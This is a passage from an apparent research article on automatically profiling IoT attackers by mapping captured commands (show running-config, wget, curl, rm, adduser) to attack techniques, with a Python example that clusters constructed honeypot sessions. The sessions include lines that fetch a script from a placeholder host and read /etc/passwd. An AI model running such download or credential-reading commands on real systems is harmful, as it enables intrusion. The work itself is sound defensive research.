Research Article
GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things
Table 1
Some examples of mapping from commands to TTP profiles.
| Knowledge base | Command | Technique | Tactic |
|---|---|---|---|
| 1st knowledge base | show running-config | Credential dumping | Credential access |
| | show startup-config | Credential dumping | Credential access |
| 2nd knowledge base | ftpget | Remote file copy | Lateral movement |
| | wget | Remote file copy | Lateral movement |
| | curl | Remote file copy | Lateral movement |
| | rcp | Remote file copy | Lateral movement |
| | copy | Remote file copy | Lateral movement |
| | show archive config | Credentials in files | Credential access |
| | show history | Input capture | Collection |
| | show logging | Input capture | Collection |
| | tar | Data compressed | Exfiltration |
| | zip | Data compressed | Exfiltration |
| | rar | Data compressed | Exfiltration |
| | shutdown | System shutdown/reboot | Impact |
| | reboot | System shutdown/reboot | Impact |
| | del | File deletion | Defense evasion |
| | rm | File deletion | Defense evasion |
| | adduser | Create account | Persistence |
| | usermod | Account manipulation | Persistence |
| | groupadd | Account manipulation | Persistence |
| | dir | File and directory discovery | Discovery |
| | ls | File and directory discovery | Discovery |
| | cd | File and directory discovery | Discovery |
| | echo | Data from local system | Collection |
| | cat | Data from local system | Collection |
| | more | Data from local system | Collection |
| | pwd | Data from local system | Collection |
| | whoami | Data from local system | Collection |
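The following is an added example (not the paper's code) showing how a mapping like Table 1 turns captured command lines into a TTP profile and how two profiles can be compared for clustering. It uses only a subset of the table's entries, splits compound shell lines before matching, and treats multi-word Cisco-style commands as whole keys; the session lines are constructed, and Jaccard similarity is this example's choice of clustering measure, not necessarily the paper's.

```python
import re

# Subset of Table 1: command -> (technique, tactic). Multi-word Cisco-style
# commands are listed so they match as a whole rather than as "show" + args.
TTP_MAP = {
    "show running-config": ("Credential dumping", "Credential access"),
    "show archive config": ("Credentials in files", "Credential access"),
    "show logging": ("Input capture", "Collection"),
    "wget": ("Remote file copy", "Lateral movement"),
    "curl": ("Remote file copy", "Lateral movement"),
    "tar": ("Data compressed", "Exfiltration"),
    "rm": ("File deletion", "Defense evasion"),
    "adduser": ("Create account", "Persistence"),
    "cd": ("File and directory discovery", "Discovery"),
    "cat": ("Data from local system", "Collection"),
    "reboot": ("System shutdown/reboot", "Impact"),
}
_KEYS = sorted(TTP_MAP, key=len, reverse=True)  # longest match wins

def split_commands(line):
    """Split one shell line on ; && | || so each command is classified alone."""
    return [p.strip() for p in re.split(r"\s*(?:;|&&|\|\|?)\s*", line) if p.strip()]

def classify(command):
    """Return (technique, tactic) for one command, or None if not in the table."""
    for key in _KEYS:
        if command == key or command.startswith(key + " "):
            return TTP_MAP[key]
    return None

def extract_profile(session):
    """TTP profile of a session: the set of (technique, tactic) pairs it exhibits."""
    profile = set()
    for line in session:
        for cmd in split_commands(line):
            ttp = classify(cmd)
            if ttp is not None:
                profile.add(ttp)
    return profile

def jaccard(a, b):
    """Profile similarity used here to decide whether two sessions cluster together
    (Jaccard is this example's choice, not necessarily the paper's measure)."""
    return len(a & b) / len(a | b) if a | b else 0.0

# Constructed honeypot sessions (not real captures); example.invalid is a reserved name.
SESSION_A = ["cd /tmp; wget http://example.invalid/x.sh", "cat /etc/passwd", "rm x.sh"]
SESSION_B = ["cd /var && curl http://example.invalid/x.sh", "cat /proc/cpuinfo", "rm -f x.sh"]
SESSION_C = ["show running-config", "show logging", "reboot"]
```

Sessions A and B use different download tools and arguments but yield the same profile, which is what lets them cluster together, while the router-style session C shares nothing with them.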